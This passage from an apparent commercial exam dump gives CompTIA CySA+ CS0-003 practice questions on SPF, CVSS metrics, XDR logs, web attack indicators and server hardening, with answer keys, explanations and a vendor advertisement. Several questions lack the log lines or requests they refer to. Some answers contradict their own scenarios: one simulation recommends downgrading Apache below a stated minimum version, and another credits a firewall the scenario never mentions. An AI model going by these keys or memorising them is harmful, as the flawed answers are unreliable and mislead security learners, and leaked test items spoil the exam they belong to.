attacks and vulnerabilities". The book also covers the usage and syntax of vulnerability scanning tools,
such as Nessus, Nmap, and Qualys, in chapter 4. Specifically, it explains the meaning and function of each
component in vulnerability scanning, such as credentialed vs. non- credentialed scans, port scanning, and
scan scheduling1, pages 149-160. It also discusses the common issues and challenges of vulnerability
scanning, such as network disruptions, false positives, and scan scope1, pages 161-162.
Therefore, this is a reliable source to verify the answer to the question.

QUESTION 119
An email hosting provider added a new data center with new public IP addresses. Which of the following
most likely needs to be updated to ensure emails from the new data center do not get blocked by spam
filters?

A. DKIM
B. SPF
C. SMTP
D. DMARC

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: SPF (Sender Policy Framework) is a DNS TXT record that lists authorized sending IP
addresses for a given domain. If an email hosting provider added a new data center with new public IP
addresses, the SPF record needs to be updated to include those new IP addresses, otherwise the emails
from the new data center may fail SPF checks and get blocked by spam filters123 References: 1: Use
DMARC to validate email, setup steps
2: How to set up SPF, DKIM and DMARC: other mail & hosting providers providers 3: Set up SPF, DKIM,
or DMARC records for my hosting email

QUESTION 120
During a scan of a web server in the perimeter network, a vulnerability was identified that could be
exploited over port 3389. The web server is protected by a WAF. Which of the following best represents
the change to overall risk associated with this vulnerability?
A. The risk would not change because network firewalls are in use.
B. The risk would decrease because RDP is blocked by the firewall.
C. The risk would decrease because a web application firewall is in place.
D. The risk would increase because the host is external facing.

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Port 3389 is commonly used by Remote Desktop Protocol (RDP), which is a service that
allows remote access to a system. A vulnerability on this port could allow an attacker to compromise the
web server or use it as a pivot point to access other systems. However, if the firewall blocks this port, the
risk of exploitation is reduced. References: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter
2: Software and Systems Security, page 67; CompTIA CySA + Study Guide: Exam CS0-003, 3rd Edition,
Chapter 3: Software and Systems Security, page 103.

QUESTION 121
A security analyst has identified a new malware file that has impacted the organization. The malware is
polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an
idle process of at least 70%. Which of the following best describes how the security analyst can effectively
review the malware without compromising the organization's network?

A. Utilize an RDP session on an unused workstation to evaluate the malware.

B. Disconnect and utilize an existing infected asset off the network.
C. Create a virtual host for testing on the security analyst workstation.
D. Subscribe to an online service to create a sandbox environment.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A sandbox environment is a safe and isolated way to analyze malware without affecting the
organization's network. An online service can provide a sandbox environment without requiring the security
analyst to set up a virtual host or use an RDP session. Disconnecting and using an existing infected asset
is risky and may not provide accurate results. References: Malware Analysis: Steps & Examples, Dynamic
Analysis

QUESTION 122
An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics
for the most critical of the vulnerabilities:

CVSS: 3.1/AV:N/AC: L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R

Which of the following represents the exploit code maturity of this critical vulnerability?

A. E:U
B. S:C
C. RC:R
D. AV:N
E. AC:L

Correct Answer: A
Explanation

Explanation/Reference:
The exploit code maturity of a vulnerability is indicated by the E metric in the CVSS temporal score. The
value of U means that no exploit code is available or unknown1. The other options are not related to the
exploit code maturity, but to other aspects of the vulnerability, such as attack vector, scope, availability,
and complexity1.
QUESTION 123
A laptop that is company owned and managed is suspected to have malware. The company implemented
centralized security logging. Which of the following log sources will confirm the malware infection?

A. XDR logs
B. Firewall logs
C. IDS logs
D. MFA logs

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: XDR logs will confirm the malware infection because XDR is a system that collects and
analyzes data from multiple sources, such as endpoints, networks, cloud applications, and email security,
to detect and respond to advanced threats12. XDR can provide a comprehensive view of the attack chain
and the context of the malware infection. Firewall logs, IDS logs, and MFA logs are not sufficient to confirm
the malware infection, as they only provide partial or indirect information about the network traffic, intrusion
attempts, or user authentication. References: Cybersecurity Analyst+ - CompTIA, XDR: definition and
benefits for MSPs| WatchGuard Blog, Extended detection and response - Wikipedia

QUESTION 124
A security analyst is trying to validate the results of a web application scan with Burp Suite.
The security analyst performs the following:

Which of the following vulnerabilitles Is the securlty analyst trylng to valldate?

A. SQL injection
B. LFI
C. XSS
D. CSRF

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The security analyst is validating a Local File Inclusion (LFI) vulnerability, as indicated by the
"/.../.../.../" in the GET request which is a common indicator of directory traversal attempts associated with
LFI. The other options are not relevant for this purpose:
SQL injection involves injecting malicious SQL statements into a database query; XSS involves injecting
malicious scripts into a web page; CSRF involves tricking a user into performing an unwanted action on a
web application. References:
According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one of the objectives for the
exam is to "use appropriate tools and methods to manage, prioritize and respond to attacks and
vulnerabilities". The book also covers the usage and syntax of Burp Suite, a tool used for testing web
application security, in chapter 6. Specifically, it explains the meaning and function of each component in
Burp Suite, such as Repeater, which allows the security analyst to modify and resend individual requests1,
page 239. Therefore, this is a reliable source to verify the answer to the question.

QUESTION 125
Which of the following is the most appropriate action a security analyst to take to effectively identify the
most security risks associated with a locally hosted server?

A. Run the operating system update tool to apply patches that are missing.
B. Contract an external penetration tester to attempt a brute-force attack.
C. Download a vendor support agent to validate drivers that are installed.
D. Execute a vulnerability scan against the target host.

Correct Answer: D
Explanation

Explanation/Reference:
A vulnerability scan is a process of identifying and assessing the security weaknesses of a system or
network. A vulnerability scan can help a security analyst to effectively identify the most security risks
associated with a locally hosted server, such as missing patches, misconfigurations, outdated software, or
exposed services. A vulnerability scan can also provide recommendations on how to remediate the
identified vulnerabilities and improve the security posture of the server12 References: 1: What is a
Vulnerability Scan? | Definition and Examples 2: Securing a server: risks, challenges and best practices -
Vaadata

QUESTION 126
Which of the following threat actors is most likely to target a company due to its questionable
environmental policies?

A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Hacktivists are threat actors who use cyberattacks to promote a social or political cause, such
as environmentalism, human rights, or democracy. They may target companies that they perceive as
violating their values or harming the public interest. Hacktivists often use techniques such as defacing
websites, launching denial-of-service attacks, or leaking sensitive data to expose or embarrass their
targets12. References: An introduction to the cyber threat environment, page 3; What is a Threat Actor?
Types & Examples of Cyber Threat Actors, section 2.

QUESTION 127
The SOC received a threat intelligence notification indicating that an employee's credentials were found on
the dark web. The user's web and log-in activities were reviewed for malicious or anomalous connections,
data uploads/downloads, and exploits. A review of the controls confirmed multifactor authentication was
enabled. Which of the following should be done first to mitigate impact to the business networks and
assets?

A. Perform a forced password reset.

B. Communicate the compromised credentials to the user.
C. Perform an ad hoc AV scan on the user's laptop.
D. Review and ensure privileges assigned to the user's account reflect least privilege.
E. Lower the thresholds for SOC alerting of suspected malicious activity.

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: The first and most urgent step to mitigate the impact of compromised credentials on the dark
web is to perform a forced password reset for the affected user. This will prevent the cybercriminals from
using the stolen credentials to access the company's network and systems. Multifactor authentication is a
good security measure, but it is not foolproof and can be bypassed by sophisticated attackers. Therefore,
changing the password as soon as possible is the best practice to reduce the risk of a data breach or other
cyber attack123 References: 1: How to monitor the dark web for compromised employee credentials 2:
How to prevent corporate credentials ending up on the dark web 3:
Data Breach Prevention: Identifying Leaked Credentials on the Dark Web

QUESTION 128
While reviewing web server logs, a security analyst discovers the following suspicious line:

Which of the following is being attempted?

A. Remote file inclusion

B. Command injection
C. Server-side request forgery
D. Reverse shell

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The suspicious line in the web server logs is an attempt to execute a command on the server,
indicating a command injection attack.References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd
Edition, Chapter 5, page 197; CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 5, page 205.

QUESTION 129
A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides
of a WAN connection. Which of the following is the most likely cause?

A. A local red team member is enumerating the local RFC1918 segment to enumerate hosts.
B. A threat actor has a foothold on the network and is sending out control beacons.
C. An administrator executed a new database replication process without notifying the SOC.
D. An insider threat actor is running Responder on the local segment, creating traffic replication.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Port 1433 is commonly used by Microsoft SQL Server, which is a database management
system. A spike in traffic on this port between two IP addresses on opposite sides of a WAN connection
could indicate a database replication process, which is a way of copying and distributing data from one
database server to another. This could be a legitimate activity performed by an administrator, but it should
be communicated to the security operations center (SOC) to avoid confusion and false alarms.
References: CompTIA CySA+ CS0-003 Certification Study Guide, Chapter 3: Security Operations, page
107; CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter
4: Security Operations, page 153.
QUESTION 130
Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard
that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the
following will enable a developer to correct this issue? (Select two).

A. Performing dynamic application security testing

B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS

Correct Answer: BD
Explanation

Explanation/Reference:
Reviewing the code and debugging the code are two methods that can help a developer identify and fix
runtime errors in the code. Reviewing the code involves checking the syntax, logic, and structure of the
code for any errors or inconsistencies. Debugging the code involves running the code in a controlled
environment and using tools such as breakpoints, watches, and logs to monitor the execution and find the
source of errors. Both methods can help improve the quality and security of the code.

QUESTION 131
A penetration tester is conducting a test on an organization's software development website. The
penetration tester sends the following request to the web interface:

Which of the following exploits is most likely being attempted?

A. SQL injection
B. Local file inclusion
C. Cross-site scripting
D. Directory traversal

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: SQL injection is a type of attack that injects malicious SQL statements into a web application's
input fields or parameters, in order to manipulate or access the underlying database. The request shown in
the image contains an SQL injection attempt, as indicated by the "UNION SELECT" statement, which is
used to combine the results of two or more queries. The attacker is trying to extract information from the
database by appending the malicious query to the original one

QUESTION 132
A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in
the past month. Which of the following public MITRE repositories would be best to review?

A. Cyber Threat Intelligence

B. Common Vulnerabilities and Exposures
C. Cyber Analytics Repository
D. ATT&CK

Correct Answer: B
Explanation

Explanation/Reference:
The Common Vulnerabilities and Exposures (CVE) is a public repository of standardized identifiers and
descriptions for common cybersecurity vulnerabilities. It helps security analysts to identify, prioritize, and
report on the most critical vulnerabilities in their systems and applications. The other options are not
relevant for this purpose: Cyber Threat Intelligence (CTI) is a collection of information and analysis on
current and emerging cyber threats; Cyber Analytics Repository (CAR) is a knowledge base of analytics
developed by MITRE based on the ATT&CK adversary model; ATT&CK is a globally-accessible
knowledge base of adversary tactics and techniques based on real-world observations.References:
According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, one of the objectives for the
exam is to "use appropriate tools and methods to manage, prioritize and respond to attacks and
vulnerabilities". The book also covers the usage and syntax of various cybersecurity frameworks and
standards, such as CVE, CTI, CAR, and ATT&CK, in chapter 1. Specifically, it explains the meaning and
function of each framework and standard, such as CVE, which provides a common language for describing
and sharing information about vulnerabilities1, page 28. Therefore, this is a reliable source to verify the
answer to the question.

QUESTION 133
Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security
Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of
the plans in place. Which of the following incident management life cycle processes

does this describe?

A. Business continuity plan

B. Lessons learned
C. Forensic analysis
D. Incident response plan

Correct Answer: B
Explanation

Explanation/Reference:
The lessons learned process is the final stage of the incident management life cycle, where the incident
team reviews the incident and evaluates the effectiveness of the response and the plans in place. The
lessons learned report should include the who-what-when information and any recommendations for
improvement123 References: 1: What is incident management? Steps, tips, and best practices 2: 5 Steps
of the Incident Management Lifecycle | RSI Security 3:
Navigating the Incident Response Life Cycle: A Comprehensive Guide
Exam F

QUESTION 1
SIMULATION

Approximately 100 employees at your company have received a Phishing email. AS a security analyst. you
have been tasked with handling this Situation.
Review the information provided and determine the following:

1. HOW many employees Clicked on the link in the Phishing email?

2. on how many workstations was the malware installed?

3. what is the executable file name of the malware?

Correct Answer: Answer: see the answer in explanation for this task.
Explanation
Explanation/Reference:
1. How many employees clicked on the link in the phishing email? According to the email server logs, 25
employees clicked on the link in the phishing email.
2. On how many workstations was the malware installed? According to the file server logs, the malware
was installed on 15 workstations.
3. What is the executable file name of the malware? The executable file name of the malware is
svchost.EXE.
Answers
1. 25
2. 15
3. svchost.EXE

QUESTION 2
SIMULATION

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening
guidelines indicate the following.

There must be one primary server or service per device.

Only default port should be used
Non- secure protocols should be disabled.
The corporate internet presence should be placed in a protected subnet Instructions :

Using the available tools, discover devices on the corporate network and the services running on these
devices.
You must determine

ip address of each device

The primary server or service each device
The protocols that should be disabled based on the hardening guidelines
Correct Answer: Answer: see the answer below in explanation:
Explanation

Explanation/Reference:
Answer below images
QUESTION 3
SIMULATION

You are a cybersecurity analyst tasked with interpreting scan data from Company As servers You must
verify the requirements are being met for all of the servers and recommend changes if you find they are not

The company's hardening guidelines indicate the following

TLS 1 2 is the only version of TLS

running.

Apache 2.4.18 or greater should be used.

Only default ports should be used.

INSTRUCTIONS

using the supplied data. record the status of compliance With the company's guidelines for each server.

The question contains two parts: make sure you complete Part 1 and Part 2. Make recommendations for
Issues based ONLY on the hardening guidelines provided.

Part 1:

AppServ1:
AppServ2:

AppServ3:
AppServ4:
Part 2:
Correct Answer: Answer: check the explanation part below for the solution:
Explanation
Explanation/Reference:
Part 1:

Part 2:
Based on the compliance report, I recommend the following changes for each server:
AppServ1: No changes are needed for this server.
AppServ2: Disable or upgrade TLS 1.0 and TLS 1.1 to TLS 1.2 on this server to ensure secure encryption
and communication between clients and the server. Update Apache from version 2.4.17 to version 2.4.18
or greater on this server to fix any potential vulnerabilities or bugs.
AppServ3: Downgrade Apache from version 2.4.19 to version 2.4.18 or lower on this server to ensure
compatibility and stability with the company's applications and policies. Change the port number from 8080
to either port 80 (for HTTP) or port 443 (for HTTPS) on this server to follow the default port convention and
avoid any confusion or conflicts with other services.
AppServ4: Update Apache from version 2.4.16 to version 2.4.18 or greater on this server to fix any
potential vulnerabilities or bugs. Change the port number from 8443 to either port 80 (for HTTP) or port 443
(for HTTPS) on this server to follow the default port convention and avoid any confusion or conflicts with
other services.
 Join Our Telegram for Exclusive Services!

Dear customers, join our Telegram for personalized pre-sales inquiries or

post-sales support. Scan the QR code or click here to experience our

dedicated services!

Join us, and you'll enjoy:

• Instant Responses: Our customer service team is always on

standby, ready to answer any questions you may have.

• Professional Support: No matter what product issues you

encounter, our experts will provide professional solutions.

• Latest Updates: Be the first to get updates on our products and

exclusive offers.

Scan the QR code and join us to stay on track.

Join our Telegram family now! Let us help you easily solve all your problems

and enjoy a worry-free shopping experience.

https://t.me/certvip
About Pass2Lead.com
As a professional IT exam study guide provider, Pass4Lead.com provides our
candidates with the most accurate and high quality IT exam training material.

Cisco Citrix CompTIA Check Point

EMC EXIN HP Juniper
LPI Nortel Oracle VMware

and so on, you can find all kinds of exam questions, study guides, practice tests here.
Our aim is to be your assistance on your way to be successful in your IT certifications.
We provide our customers with the 100% Pass Guaranteed or Full Refund.

We spare no efforts to help you to pass any IT Certification exams at the first try.
Do not hesitate to contact us if you need any help on the products, payments or
questions about IT exams.

You can reach us on:

https://www.Pass2Lead.com/contact-us.html

We will get in touch with you in 24 hours. You satisfactory is the recognition for us.
You could rely upon us anytime you need help. We are at your service.

Guarantee & Policy | Privacy & Policy | Terms & Conditions

Any charges made through this site will appear as Global Simulators Limited.
All trademarks are the property of their respective owners.

Copyright © Pass2Lead.com, All Rights Reserved.